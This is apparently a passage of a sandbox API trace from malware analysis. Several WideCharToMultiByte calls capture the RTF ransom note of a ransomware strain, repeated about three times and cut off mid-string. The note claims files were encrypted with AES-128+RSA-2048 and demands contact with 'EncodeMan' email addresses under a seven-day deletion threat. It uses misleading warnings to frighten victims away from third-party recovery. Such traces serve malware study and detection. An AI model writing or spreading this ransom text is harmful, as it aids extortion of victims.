460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" 